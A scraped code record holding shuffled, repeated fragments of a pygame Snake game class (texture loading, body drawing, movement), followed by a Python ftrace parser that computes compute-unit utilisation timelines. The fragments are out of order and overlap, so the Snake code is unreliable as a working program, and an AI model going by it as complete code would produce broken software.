== 1: self.pyScreen.blit(self.body_br,", "pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical", "-1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == -1:", "and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y ==", "1] - block next_block = self.body[index - 1] - block if previous_block.x ==", "Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0,", "self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake()", "= pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png')", "body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING]", "self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation ==", "from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving = False", "previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1", "next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1", "# Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png') self.body_bl =", "body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if", "is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) -", "False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen =", "self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y == -1 or previous_block.y", "== Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def", "pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right", "self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation ==", "if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head =", "- self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0):", "self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail", "self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal =", "cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face", "def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen", "set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) ->", "else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body", "import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw", "= screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self)", "(abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body", "load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left =", ".eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving = False def", "body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = False body_copy =", "self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation", "self.slowed = False def draw_snake_object(self) -> None: for index, block in enumerate(self.body): #", "= False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen", "None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png')", "import Saw from .eatable.cake import Cake class Snake(object): is_moving = False def __init__(self,", "Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] -", "Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation", "head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() ==", "False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction)", "def add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf", "= False def draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect", "block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and", "pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) -> None: self.new_block =", "self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up =", "self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed", "self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() !=", "== -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1 or", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png')", "else: previous_block = self.body[index + 1] - block next_block = self.body[index - 1]", "rect for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size)", "if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else:", "+ 1] - block next_block = self.body[index - 1] - block if previous_block.x", "-1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1 or previous_block.y", "elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted()", "else: if previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1", "pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr =", "self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation ==", "or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0]", "== -1 and next_block.y == 1 or previous_block.y == 1 and next_block.x ==", "== Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False", "self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation ==", "Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png')", "= self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1):", "def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left", "False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else:", "= self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation", "= self.body[index + 1] - block next_block = self.body[index - 1] - block", "self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1 or previous_block.y ==", "block_rect) else: if previous_block.x == -1 and next_block.y == -1 or previous_block.y ==", "= body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction)", "# Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png')", "= self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None:", "Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl", "self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail", "self.body[index + 1] - block next_block = self.body[index - 1] - block if", "- block next_block = self.body[index - 1] - block if previous_block.x == next_block.x:", "== 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and", "for index, block in enumerate(self.body): # rect for positioning x_pos = int(block.x *", "= self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface:", "= self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown()", "pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left", "True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake():", "self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head", "previous_block = self.body[index + 1] - block next_block = self.body[index - 1] -", "# Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left =", "1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y:", "# what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index", "# rect for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y *", "Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy =", "= True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right =", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper", "next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y == -1 or", "== Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif", "update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head", "def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) ->", "tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up", "head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down", "== -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and", "- block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal,", "self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation ==", "pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br", "True self.direction = vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self)", "self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body)", "int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is", "-1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y", "and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y ==", "self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br =", "previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1 and next_block.x", "* cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha", "and next_block.y == -1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr,", "self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1 or previous_block.y ==", "direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body)", "self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation ==", "block in enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size) y_pos", "self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:]", "enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y", "== -1 and next_block.y == -1 or previous_block.y == -1 and next_block.x ==", "Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0]", "self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index +", "self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right", "-> None: for index, block in enumerate(self.body): # rect for positioning x_pos =", "== 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1 or", "Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block", "block_rect) elif previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1", "= False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] +", "previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None:", "tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1]", "body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown()", "= True self.direction = vec def add_block(self) -> None: self.new_block = True def", "self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving", "self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface:", "= body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving =", "y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what", "= self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1):", "block_rect) elif previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1", "next_block.y == -1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect)", "self.new_block = False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0]", "-> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png')", "tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1:", "self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1", "elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head =", "= pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png')", "self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block", "__init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction", "def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0):", "1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self)", "else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block", "== 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: #", "- 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y ==", ".config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from", "next_block.y == 1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect)", "or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x ==", "if previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1 and", "== -1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif", "block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self)", "== Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif", ".eatable.cake import Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) ->", "False self.slowed = False def draw_snake_object(self) -> None: for index, block in enumerate(self.body):", "and next_block.y == -1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl,", "1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block = self.body[index", "next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1", "add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up", "- 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block =", "self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation ==", "== -1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif", "head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif", "elif previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1 and", "== len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block", "FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import", "+ self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else:", "vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: #", "= pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face if index", "!= 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False else:", "Saw from .eatable.cake import Cake class Snake(object): is_moving = False def __init__(self, screen:", "elif previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1 and", "self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1):", "Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body =", "1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1 or previous_block.y", "= self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = False", "previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1 and next_block.x", "self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down =", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr", "face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect)", "= pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png')", "-> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head =", "-> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up =", "is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)]", "next_block.y == 1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect)", "pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left", "self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if", "elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation =" ]
[ "list. If this menu has already been notified, it will' \\ 'skip sending.'", "Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list. If this menu", "= 'Sends today\\'s menu to lunch-bot mailing list. If this menu has already", "send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list. If", "BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to", "from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot", "'Sends today\\'s menu to lunch-bot mailing list. If this menu has already been", "mailing list. If this menu has already been notified, it will' \\ 'skip", "help = 'Sends today\\'s menu to lunch-bot mailing list. If this menu has", "this menu has already been notified, it will' \\ 'skip sending.' def handle(self,", "import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu", "lunch-bot mailing list. If this menu has already been notified, it will' \\", "django.core.management.base import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s", "today\\'s menu to lunch-bot mailing list. If this menu has already been notified,", "If this menu has already been notified, it will' \\ 'skip sending.' def", "to lunch-bot mailing list. If this menu has already been notified, it will'", "from django.core.management.base import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends", "util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing", "menu has already been notified, it will' \\ 'skip sending.' def handle(self, *args,", "import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list.", "class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list. If this", "<filename>menu/management/commands/send_notification.py from django.core.management.base import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help =", "already been notified, it will' \\ 'skip sending.' def handle(self, *args, **options): send_menu_email()", "has already been notified, it will' \\ 'skip sending.' def handle(self, *args, **options):", "menu to lunch-bot mailing list. If this menu has already been notified, it" ]
[ "writing, software # distributed under the License is distributed on an \"AS IS\"", "continue cuRetData[core] = [] runT = 0 start = 0 for e in", "'cu_done': if start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\",", "License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge')", "continue print(\"##### Util of %s: %.2f\" % (core, runT * 100 / totalT))", "KIND, either express or implied. # See the License for the specific language", "import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def", "Unless required by applicable law or agreed to in writing, software # distributed", "core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "[] runT = 0 start = 0 for e in cuEvents[core]: eventType =", "under the License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def", "cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] =", "0 for e in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start", "totalT == 0: continue cuRetData[core] = [] runT = 0 start = 0", "a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable", "\"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return", "# prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT +=", "law or agreed to in writing, software # distributed under the License is", "of %s: %.2f\" % (core, runT * 100 / totalT)) return cuRetData parser.parserBase.register(cuEdgeParser())", "if start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88,", "the License for the specific language governing permissions and # limitations under the", "compliance with the License. # You may obtain a copy of the License", "{} for l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID", "# limitations under the License. import parser.parserBase import parser.ftraceUtil CUs = [] class", "= parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID", "Util of %s: %.2f\" % (core, runT * 100 / totalT)) return cuRetData", "and # limitations under the License. import parser.parserBase import parser.ftraceUtil CUs = []", "language governing permissions and # limitations under the License. import parser.parserBase import parser.ftraceUtil", "== 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start == 0:", "parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap", "elif eventType == 'cu_done': if start == 0: continue # prefix, i.pid, i.startTime,", "this file except in compliance with the License. # You may obtain a", "= 0 start = 0 for e in cuEvents[core]: eventType = e.func if", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed", "you may not use this file except in compliance with the License. #", "for the specific language governing permissions and # limitations under the License. import", "= [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap =", "= e.func if eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done':", "if eventType 